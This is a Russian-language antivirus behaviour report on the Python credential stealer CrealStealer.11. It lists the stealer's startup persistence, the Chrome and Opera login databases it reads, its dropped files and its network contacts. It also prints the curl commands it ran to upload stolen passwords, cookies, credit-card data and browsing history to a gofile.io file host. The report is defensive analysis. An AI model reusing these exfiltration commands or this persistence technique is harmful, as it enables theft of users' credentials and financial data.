Python.CrealStealer.11

Техническая информация

Для обеспечения автозапуска и распространения

Создает или изменяет следующие файлы

%APPDATA%\microsoft\windows\start menu\programs\startup\<Имя файла>.exe

Вредоносные функции

Читает файлы, отвечающие за хранение паролей сторонними программами

%APPDATA%\opera software\opera stable\login data
%LOCALAPPDATA%\google\chrome\user data\default\login data
%LOCALAPPDATA%\google\chrome\user data\default\web data

Изменения в файловой системе

Создает следующие файлы

%TEMP%\_mei23202\crypto\cipher\_arc4.pyd
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\wheel
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\record
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\metadata
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\license
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\installer
%TEMP%\_mei23202\cryptography\hazmat\bindings\_rust.pyd
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\top_level.txt
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\wheel
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\record
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\metadata
%TEMP%\_mei23202\importlib_metadata-7.1.0.dist-info\top_level.txt
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\license.bsd
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\license
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\installer
%TEMP%\_mei23202\charset_normalizer\md__mypyc.cp311-win_amd64.pyd
%TEMP%\_mei23202\charset_normalizer\md.cp311-win_amd64.pyd
%TEMP%\_mei23202\certifi\cacert.pem
%TEMP%\_mei23202\bcrypt\_bcrypt.pyd
%TEMP%\_mei23202\base_library.zip
%TEMP%\_mei23202\_uuid.pyd
%TEMP%\_mei23202\_ssl.pyd
%TEMP%\_mei23202\_sqlite3.pyd
%TEMP%\_mei23202\cryptography-42.0.5.dist-info\license.apache
%TEMP%\_mei23202\libcrypto-3.dll
%TEMP%\_mei23202\libffi-8.dll
%TEMP%\_mei23202\libssl-3.dll
%TEMP%\crhistory.txt
%LOCALAPPDATA%\tempcrffmxkkog.db
%LOCALAPPDATA%\tempcrsjllssuo.db
%LOCALAPPDATA%\tempcrpunobprb.db
%LOCALAPPDATA%\tempcrzficmzwp.db
%LOCALAPPDATA%\tempcrgfdygudg.db
%LOCALAPPDATA%\tempcrjqhonwur.db
%TEMP%\_mei23202\win32\win32evtlog.pyd
%TEMP%\_mei23202\win32\win32api.pyd
%TEMP%\_mei23202\wheel-0.41.2.dist-info\entry_points.txt
%TEMP%\_mei23202\wheel-0.41.2.dist-info\wheel
%TEMP%\_mei23202\wheel-0.41.2.dist-info\record
%TEMP%\_mei23202\wheel-0.41.2.dist-info\metadata
%TEMP%\_mei23202\wheel-0.41.2.dist-info\license.txt
%TEMP%\_mei23202\wheel-0.41.2.dist-info\installer
%TEMP%\_mei23202\unicodedata.pyd
%TEMP%\_mei23202\sqlite3.dll
%TEMP%\_mei23202\simplejson\_speedups.cp311-win_amd64.pyd
%TEMP%\_mei23202\select.pyd
%TEMP%\_mei23202\pywin32_system32\pywintypes311.dll
%TEMP%\_mei23202\python311.dll
%TEMP%\_mei23202\python3.dll
%TEMP%\_mei23202\pyexpat.pyd
%TEMP%\_mei23202\_socket.pyd
%LOCALAPPDATA%\tempcrwstwnpzp.db
%TEMP%\_mei23202\_queue.pyd
%TEMP%\_mei23202\_multiprocessing.pyd
%TEMP%\_mei23202\crypto\hash\_md5.pyd
%TEMP%\_mei23202\crypto\hash\_md4.pyd
%TEMP%\_mei23202\crypto\hash\_md2.pyd
%TEMP%\_mei23202\crypto\hash\_blake2s.pyd
%TEMP%\_mei23202\crypto\hash\_blake2b.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_ofb.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_ocb.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_eksblowfish.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_ecb.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_des3.pyd
%TEMP%\_mei23202\crypto\hash\_ripemd160.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_des.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_cfb.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_cbc.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_cast.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_blowfish.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_arc2.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_aesni.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_aes.pyd
%TEMP%\_mei23202\crypto\cipher\_pkcs1_decode.pyd
%TEMP%\_mei23202\crypto\cipher\_chacha20.pyd
%TEMP%\_mei23202\crypto\cipher\_salsa20.pyd
%TEMP%\_mei23202\crypto\cipher\_raw_ctr.pyd
%TEMP%\_mei23202\crypto\hash\_sha1.pyd
%TEMP%\_mei23202\crypto\hash\_sha224.pyd
%TEMP%\_mei23202\crypto\hash\_sha256.pyd
%TEMP%\_mei23202\_lzma.pyd
%TEMP%\_mei23202\_hashlib.pyd
%TEMP%\_mei23202\_decimal.pyd
%TEMP%\_mei23202\_ctypes.pyd
%TEMP%\_mei23202\_cffi_backend.cp311-win_amd64.pyd
%TEMP%\_mei23202\_bz2.pyd
%TEMP%\_mei23202\_asyncio.pyd
%TEMP%\_mei23202\vcruntime140_1.dll
%TEMP%\_mei23202\vcruntime140.dll
%TEMP%\_mei23202\crypto\util\_strxor.pyd
%TEMP%\_mei23202\crypto\util\_cpuid_c.pyd
%TEMP%\_mei23202\crypto\publickey\_x25519.pyd
%TEMP%\_mei23202\crypto\publickey\_ed448.pyd
%TEMP%\_mei23202\crypto\publickey\_ed25519.pyd
%TEMP%\_mei23202\crypto\publickey\_ec_ws.pyd
%TEMP%\_mei23202\crypto\protocol\_scrypt.pyd
%TEMP%\_mei23202\crypto\math\_modexp.pyd
%TEMP%\_mei23202\crypto\hash\_poly1305.pyd
%TEMP%\_mei23202\crypto\hash\_keccak.pyd
%TEMP%\_mei23202\crypto\hash\_ghash_portable.pyd
%TEMP%\_mei23202\crypto\hash\_ghash_clmul.pyd
%TEMP%\_mei23202\crypto\hash\_sha512.pyd
%TEMP%\_mei23202\crypto\hash\_sha384.pyd
%TEMP%\_mei23202\_overlapped.pyd
%LOCALAPPDATA%\tempcruvnnbxxk.db

Сетевая активность

Подключается к

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'di##ord.com':443
'st####.gofile.io':443
'x1.#.lencr.org':80
'r3.#.lencr.org':80

TCP

Запросы HTTP GET

http://x1.#.lencr.org/
http://r3.#.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRI2smg%2ByvTLU%2Fw3mjS9We3NfmzxAQUFC6zF7dYVsuuUAlA5h%2BvnYsUwsYCEgR%2BK3BWYQGKFivzodqw8AYNkw%3D%3D

Другие

'ap#.#pify.org':443
'ap#.#ofile.io':443
'ge####ation-db.com':443
'di##ord.com':443
'st####.gofile.io':443

UDP

DNS ASK ap#.#pify.org
DNS ASK ap#.#ofile.io
DNS ASK ge####ation-db.com
DNS ASK di##ord.com
DNS ASK st####.gofile.io
DNS ASK x1.#.lencr.org
DNS ASK r3.#.lencr.org

Другое

Создает и запускает на исполнение

'<SYSTEM32>\cmd.exe' /c "ver"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "tasklist"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile"' (со скрытым окном)

Перезапускает анализируемый образец

Запускает на исполнение

'<SYSTEM32>\cmd.exe' /c "ver"
'<SYSTEM32>\cmd.exe' /c "tasklist"
'<SYSTEM32>\tasklist.exe'
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crpasswords.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crcookies.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crcreditcards.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crautofills.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crhistories.txt" https://store4.gofile.io/uploadFile
'<SYSTEM32>\cmd.exe' /c "curl -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile"
'<SYSTEM32>\curl.exe' -F "file=@%TEMP%\crbookmarks.txt" https://store4.gofile.io/uploadFile

Технологии

Термины

Обучение и просвещение

Мифы

Техническая информация

Рекомендации по лечению

Демо бесплатно на 14 дней